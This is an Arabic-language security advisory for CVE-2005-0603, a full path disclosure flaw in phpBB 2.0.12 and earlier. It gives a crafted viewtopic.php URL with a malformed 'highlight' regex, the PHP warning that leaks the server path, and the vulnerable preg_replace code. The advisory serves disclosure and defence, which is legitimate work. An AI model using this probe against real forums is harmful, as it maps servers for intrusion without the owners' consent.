
استغلال برهان المفهوم لـ CVE-2005-0603، يُظهر ثغرة كشف المسار الكامل في phpBB 2.0.12 عبر تعبير منتظم (regex) مصمم خصيصًا في معامل highlight في viewtopic.php.
البرنامج: phpBB 2.0.12 الصفحة الرئيسية: http://www.phpbb.com الإصدارات المعرضة للخطر: phpBB 2.0.12 والإصدارات الأقل الخطر: منخفض!! التأثير: كشف المسار الكامل
-==phpBB 2.0.12 كشف المسار الكامل==-
phpBB هي حزمة لوحة إعلانات مفتوحة المصدر عالية القوة، قابلة للتوسيع بالكامل، وقابلة للتخصيص بشكل كبير. تتميز phpBB بواجهة سهلة الاستخدام، لوحة إدارة بسيطة ومباشرة، وأسئلة شائعة مفيدة. بناءً على لغة الخادم PHP القوية واختيارك من قواعد بيانات MySQL، MS-SQL، PostgreSQL أو Access/ODBC، فإن phpBB هي الحل المجتمعي المجاني المثالي لجميع المواقع.
localhost والعديد من المنتديات
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
سيظهر شيء مثل هذا.
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
سيعطي كشفًا كاملاً للمسار وشيء آخر لاحظته هو أن المشاركات تتغير ولا يظهر أي شيء. في متغير الإبراز
هنا المشكلة: -----[ بداية كود الثغرة ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ نهاية كود الثغرات ] ------------------------------------ لا تستعير أشياءً lol.
ليس بعد xD
ليس بعد xD
حسنًا، شيء آخر لاحظته كان في php.ini
magic_quotes_gpc = On magic_quotes_sybase = Off
يجب عليك تشغيل كليهما إلى ON
http://neossecurity.net/Advisories/Advisory-06.txt
اكتشف بواسطة HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
لديك أسئلة؟ http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
وشعبي الكولومبي